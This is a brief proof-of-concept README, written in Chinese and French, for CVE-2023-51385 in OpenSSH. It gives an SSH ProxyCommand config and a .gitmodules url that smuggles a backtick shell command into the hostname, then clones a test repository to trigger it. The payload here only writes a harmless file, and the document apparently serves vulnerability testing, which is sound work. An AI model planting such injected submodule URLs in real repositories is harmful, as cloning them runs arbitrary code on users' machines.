
一个验证对CVE-2023-51385
Il faut d'abord ajouter le contenu suivant dans ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Il y a une injection de commande dans l'instruction du fichier .gitmodules
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Une fois la configuration terminée, exécutez la commande ci-dessous pour déclencher l'exploitation
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
En cas de succès, un fichier cve.txt sera généré dans le répertoire CVE-2023-51385_test

Note : OpenSSH doit être < 9.6p1
Pour plus de détails, voir cet article :